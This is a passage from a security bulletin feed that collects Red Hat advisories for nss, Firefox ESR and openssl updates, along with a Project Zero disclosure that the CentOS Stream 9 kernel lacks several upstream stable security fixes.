nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
nss-debuginfo-3.79.0-5.el7_9.ppc.rpm  
nss-debuginfo-3.79.0-5.el7_9.ppc64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.ppc.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.ppc64.rpm

ppc64le:  
nss-debuginfo-3.79.0-5.el7_9.ppc64le.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.ppc64le.rpm

s390x:  
nss-debuginfo-3.79.0-5.el7_9.s390.rpm  
nss-debuginfo-3.79.0-5.el7_9.s390x.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.s390.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.s390x.rpm

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
nss-3.79.0-5.el7_9.src.rpm

x86_64:  
nss-3.79.0-5.el7_9.i686.rpm  
nss-3.79.0-5.el7_9.x86_64.rpm  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-devel-3.79.0-5.el7_9.i686.rpm  
nss-devel-3.79.0-5.el7_9.x86_64.rpm  
nss-sysinit-3.79.0-5.el7_9.x86_64.rpm  
nss-tools-3.79.0-5.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
nss-debuginfo-3.79.0-5.el7_9.i686.rpm  
nss-debuginfo-3.79.0-5.el7_9.x86_64.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.i686.rpm  
nss-pkcs11-devel-3.79.0-5.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4d9zjgjWX9erEAQi0VA/9EDOjHMY594bv+AZ4cg4w1wAKFyh+3m+j  
jyOn0aHNkLFAXyHixGKeANhURkvQ6MG2CWVz/2idzPWvrVBMAmN26OXOJI7MmOve  
AZPPt+kK83ec+PAdNLRKDWlMXx/C7YxIDlMolC3vsHs8GFOh07sQSl+qCgCUsoqL  
wULhFZoxfjvMRM7PNsXYrjWhOQkbCZYudbp3sXhWXNcMFGttR2I51f0AVWvVl1P1  
JPwVBlEK0EphYWNncr2zQphP6zWLPyl0B0o+7O/M5a/bkXrAN13ShHv8N06Rmxry  
XFWJTk9DyPQljYK2dYJjo0N/9zDKouXwdTxuwoxPYhrFgsy+VKEFp47oFUlrzLB6  
x5pdDarqpdcOkPFNZuRjuBw2RbMozWkoy+JajW7NXFz3XYZky9B95RZSNI2lHhdQ  
cwqJ2aZSAgOJMexcxPxkiwkE4l2V82yYBEHgkf2/6/HZSoYCFZtYJKF5miPaMNYY  
nhbc2w6Z3aQ78C5jS9wqdVsJsCpVPflwRq8FXUO0bAB91VG/GvqAIdH/VhxAlXy5  
5h2g/skrFCTAR9iKE4AWm5uk1mPN/tTQa7eHY7fx/fA3cTm46Jd/5am0w8IhZHoq  
I1X6fJzE3WMg4AZ6y/BAiVSTxolLhepNy3zdCP8cpyK+aMDipPimw8rddTayiEaU  
1y2vLw5oCe4=ZIU4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1332-01

Red Hat Security Advisory 2023-1333-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1333-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1333  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
firefox-102.9.0-3.el7_9.src.rpm

x86_64:  
firefox-102.9.0-3.el7_9.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
firefox-102.9.0-3.el7_9.i686.rpm  
firefox-debuginfo-102.9.0-3.el7_9.i686.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
firefox-102.9.0-3.el7_9.src.rpm

ppc64:  
firefox-102.9.0-3.el7_9.ppc64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.ppc64.rpm

ppc64le:  
firefox-102.9.0-3.el7_9.ppc64le.rpm  
firefox-debuginfo-102.9.0-3.el7_9.ppc64le.rpm

s390x:  
firefox-102.9.0-3.el7_9.s390x.rpm  
firefox-debuginfo-102.9.0-3.el7_9.s390x.rpm

x86_64:  
firefox-102.9.0-3.el7_9.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

x86_64:  
firefox-102.9.0-3.el7_9.i686.rpm  
firefox-debuginfo-102.9.0-3.el7_9.i686.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
firefox-102.9.0-3.el7_9.src.rpm

x86_64:  
firefox-102.9.0-3.el7_9.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
firefox-102.9.0-3.el7_9.i686.rpm  
firefox-debuginfo-102.9.0-3.el7_9.i686.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQj81A//S6TInGACud9jWKSoJ4HAJyy2S8hpEbtK  
gCLwSk0UoRVJD9jSQu9pOBBVueCabQzeOEH3GLmHxyYdrGYnhZIxnmayn/Z704TT  
j1i5Pl+cecMUG/4gLsMbRQCB+n8wkfoWpkBK4Pk6FbyMX6ERoj2iEdFlFZ71FjyK  
LjnjiKSsMalugN3Aa0pn2WOrVWo6SLfXLkmdDc3PLtBRQsvIgrmnwOQBet7fDRlV  
dbCTfC7lRqriSZw1lvVWXWitoK0AJmhUlpLUGxXFftkCZ6hAeW23rsnsA/GwoDcT  
8phSbbkyLUu0MuPWP2KTad8dZh9MO82sIzOlZDiQac8LCv9V16k1DWDZSQV/tdFv  
rwWpv+HWGJ9uJSY0L5Tdi8KBrVlIVBDShV6p8mBHLoUcnVYhjfC6VLJ76aZDPHwb  
13mt56+xL5QTA28P+zIlp3ErYncYz4zxz0qtY4YFt5tq+JsPE+LQ36YoClDqY5A4  
8j1Uyvj0vTlXwWBns3KmpxgKOQ+V5aPh6tWH2gu/oTVB4qLcduJ8hf72gPLMCpZB  
7maVF1965oSDf1ee6BU2PRuBLWe15+jbb/CkKWKjiaOR7m1XcqHaRgQOGMOHezC0  
K3t6lwqw5OU5NCZyRdU5M6TRQoFYAHWWDC/9yhkkkZ4Q9V64kePEWQT/J+z3hFcq  
fGlU9/kXsOM=Go6C  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1333-01

Red Hat Security Advisory 2023-1335-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1335-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1335  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

ppc64:  
openssl-1.0.2k-26.el7_9.ppc64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc64.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc64.rpm

ppc64le:  
openssl-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-devel-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-libs-1.0.2k-26.el7_9.ppc64le.rpm

s390x:  
openssl-1.0.2k-26.el7_9.s390x.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390x.rpm  
openssl-devel-1.0.2k-26.el7_9.s390.rpm  
openssl-devel-1.0.2k-26.el7_9.s390x.rpm  
openssl-libs-1.0.2k-26.el7_9.s390.rpm  
openssl-libs-1.0.2k-26.el7_9.s390x.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
openssl-debuginfo-1.0.2k-26.el7_9.ppc.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64.rpm  
openssl-perl-1.0.2k-26.el7_9.ppc64.rpm  
openssl-static-1.0.2k-26.el7_9.ppc.rpm  
openssl-static-1.0.2k-26.el7_9.ppc64.rpm

ppc64le:  
openssl-debuginfo-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-perl-1.0.2k-26.el7_9.ppc64le.rpm  
openssl-static-1.0.2k-26.el7_9.ppc64le.rpm

s390x:  
openssl-debuginfo-1.0.2k-26.el7_9.s390.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.s390x.rpm  
openssl-perl-1.0.2k-26.el7_9.s390x.rpm  
openssl-static-1.0.2k-26.el7_9.s390.rpm  
openssl-static-1.0.2k-26.el7_9.s390x.rpm

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
openssl-1.0.2k-26.el7_9.src.rpm

x86_64:  
openssl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-devel-1.0.2k-26.el7_9.i686.rpm  
openssl-devel-1.0.2k-26.el7_9.x86_64.rpm  
openssl-libs-1.0.2k-26.el7_9.i686.rpm  
openssl-libs-1.0.2k-26.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
openssl-debuginfo-1.0.2k-26.el7_9.i686.rpm  
openssl-debuginfo-1.0.2k-26.el7_9.x86_64.rpm  
openssl-perl-1.0.2k-26.el7_9.x86_64.rpm  
openssl-static-1.0.2k-26.el7_9.i686.rpm  
openssl-static-1.0.2k-26.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQgXUA/8C3pn0SsQbBdhO20gpMoAy86c/lqv+iCz  
1NyIsfk6xTvXXoigT5Rsx0GJVSoh7ZcPTGgapkoQLBM4Wvv3bSJCPeDQLtp2Q+Me  
DSEm+QE8V8RghpoadjIWq98uk7Aw6zI71Cu7twHoDQH3uxCZ3Vzw2O8pLjroZifS  
/xWBC6R0Vn+HkMHsYYHqXVFpOwgTb3QWl8GJiXsM5TEpqO/CgWcZ9CHoQuKybV+o  
PbRYL8PgILj1NNDvaUK/WyQ9oCO++x1JCl4hWFs7FsyoBbQU6/JBCwTHNhVilykF  
E/KDXy1AUx0ry1ygy2t12D1NwOS/QIPvryvr8/SJ4Fo4iR2n+q1QU4Mnj1N16WCN  
bYm4pZlQsCJ9g+2qTBS32LS3ua3Glwfng4DkmJIkNGmJ4ixPKvut7MsnOSvMHaKj  
Wmxc/bCCNKg6Zlhz6RO2XmSNNc86u6Jkd3367QrkJYScUrvbKuj8w1acy+B5Cf9W  
dzKOEE73xC6n495NKe3pk3zHymu9eT4sOIhjQ/t4P6gwWEFmw1TLN65aNO8O8bfj  
T2HbLA0V81Xysq4WzlrWVR7uRYOyMlPbBjSa3g6MZv7BqB6/Eq9gqqCuNpsWSfyl  
x3oWlRhKb7LJnwYqRo9Lryoro/aUlmwJOmAa5yyb/GKNa3XkTrL8dw4BRsyU5NM6  
29sbSDI9Q+0=EWmC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1335-01

The kernel tree of CentOS Stream 9 suffers from multiple use-after-free conditions that were already patched in upstream stable trees.

    CentOS Stream 9: missing kernel security fixesSomeone reminded me last week that lots of enterprise Linux kernels arenot based on upstream stable trees. The most notable enterprise Linuxdistro I'm aware of is RHEL (Red Hat Enterprise Linux), so I decided totake a look at the kernel tree of CentOS Stream 9 - according to<https://developers.redhat.com/products/rhel/contribute-to-rhel>CentOS Stream is the closest freely available thing to RHEL.The CentOS Stream 9 kernel(<https://gitlab.com/redhat/centos-stream/src/kernel/centos-stream-9>)is based on the original upstream 5.14 release, so I decided to lookthrough for interesting commits in the linux-5.15.y stable tree andcheck whether the same commits exist in the CentOS kernel tree.One interesting candidate I found is390031c94211 (\"coredump: Use the vma snapshot in fill_files_note\")which fixes a locking bug that can lead to out-of-bounds writes,but from what I can tell actually exploiting this would be a big painbecause unless you manage to race with the vulnerable code twice,a memory write will happen approximately 4GiB out of bounds.ebda44da44f6 (\"net: sched: fix race condition in qdisc_graft()\")also looked maybe interesting.9a2544037600 (\"ovl: fix use after free in struct ovl_aio_req\")looks like a moderately nice bug, but I think it might only behittable on CentOS if an ext4 filesystem is mounted, althoughhttps://access.redhat.com/articles/rhel-limits seems to implythat ext4 is a supported filesystem on RHEL.I am reporting this bug under our usual 90-day deadline this time because ourpolicy currently doesn't have anything stricter for cases where security fixesaren't backported; we might change our treatment of this type of issue in thefuture.It would be good if upstream Linux and distributions like you could figure outsome kind of solution to keep your security fixes in sync, so that an attackerwho wants to quickly find a nice memory corruption bug in CentOS/RHEL can'tjust find such bugs in the delta between upstream stable and your kernel.(I realize there's probably a lot of history here.)This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-03-19.Related CVE Numbers: CVE-2023-1249,CVE-2023-0590,CVE-2023-1252.Found by: jannh@google.com

CentOS Stream 9 Missing Kernel Security Fixes

Red Hat Security Advisory 2023-1336-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.9.0 ESR.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2023:1336-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1336  
Issue date:        2023-03-20  
CVE Names:         CVE-2023-25751 CVE-2023-25752 CVE-2023-28162  
                   CVE-2023-28164 CVE-2023-28176  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.9.0 ESR.

Security Fix(es):

* Mozilla: Incorrect code generation during JIT compilation  
(CVE-2023-25751)

* Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9  
(CVE-2023-28176)

* Mozilla: Potential out-of-bounds when accessing throttled streams  
(CVE-2023-25752)

* Mozilla: Invalid downcast in Worklets (CVE-2023-28162)

* Mozilla: URL being dragged from a removed cross-origin iframe into the  
same tab triggered navigation (CVE-2023-28164)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2178458 - CVE-2023-25751 Mozilla: Incorrect code generation during JIT compilation  
2178460 - CVE-2023-25752 Mozilla: Potential out-of-bounds when accessing throttled streams  
2178466 - CVE-2023-28162 Mozilla: Invalid downcast in Worklets  
2178470 - CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation  
2178472 - CVE-2023-28176 Mozilla: Memory safety bugs fixed in Firefox 111 and Firefox ESR 102.9

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
firefox-102.9.0-3.el8_7.src.rpm

aarch64:  
firefox-102.9.0-3.el8_7.aarch64.rpm  
firefox-debuginfo-102.9.0-3.el8_7.aarch64.rpm  
firefox-debugsource-102.9.0-3.el8_7.aarch64.rpm

ppc64le:  
firefox-102.9.0-3.el8_7.ppc64le.rpm  
firefox-debuginfo-102.9.0-3.el8_7.ppc64le.rpm  
firefox-debugsource-102.9.0-3.el8_7.ppc64le.rpm

s390x:  
firefox-102.9.0-3.el8_7.s390x.rpm  
firefox-debuginfo-102.9.0-3.el8_7.s390x.rpm  
firefox-debugsource-102.9.0-3.el8_7.s390x.rpm

x86_64:  
firefox-102.9.0-3.el8_7.x86_64.rpm  
firefox-debuginfo-102.9.0-3.el8_7.x86_64.rpm  
firefox-debugsource-102.9.0-3.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25751  
https://access.redhat.com/security/cve/CVE-2023-25752  
https://access.redhat.com/security/cve/CVE-2023-28162  
https://access.redhat.com/security/cve/CVE-2023-28164  
https://access.redhat.com/security/cve/CVE-2023-28176  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBh4dtzjgjWX9erEAQg87Q/+PKo6O1kRwMFpHkpBsSymKSc+Ulnnae6T  
QyFVb54cSXh61UV2pkDkaM2wdWIB4kqMJC0qypkvjRdyd4X1JHAnAJ8a1pcoA9e2  
x/F7ifLOG9EIHWc/cvDgQc7JdiYx+0gGgfGTNNfo7WqJNSA2WeeEGfB88vH1SNtt  
fzYSySlJlyQ3Ry/GnaGJ1zj5IzWR9sobsexu8coHS8czs3KPFt//RVleQcwM+clC  
nA00JGWzWtsjIKNmtOdvsSeMiBu5F+Sz3qVCDvHrwqFUVM2uNg67qESc+HSSQct6  
vibydDsz7FJqhePmXSuVSNZFiYhti+5hfYj2EmsNq5K9uyfhGg7c3rYo9QM18jfe  
TmgxlQx1K690DdH2tPb8QJpQgTuhkbJO6zTJqC/rprhfY97iDOQPcd1U9zWH84ag  
2OlTprMHQ3lNXtO6k5JHIfhJ37rIsBLiz9VggBW/6Muhuozjj5j/6CFJQhuEEVLh  
N29SaOokONjw7nS1YSyeKP3byOzvq4j0DLZoB7LGj8wkJfJ6b70EYf9GoVb/5Xdk  
7Hgt0B099KqpgVNJiFsDmVMRsinWTTirg0uWgerTaYl1gUOX9IfaqOYmFjchpCBw  
f0vrfEg7j5sYdzIqFXci0X7ZbW1M0XvCOMwu5krElbnwp0l9/LLdw2/2O/5XlXdj  
yf+1Jyp0mYg=lUzG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux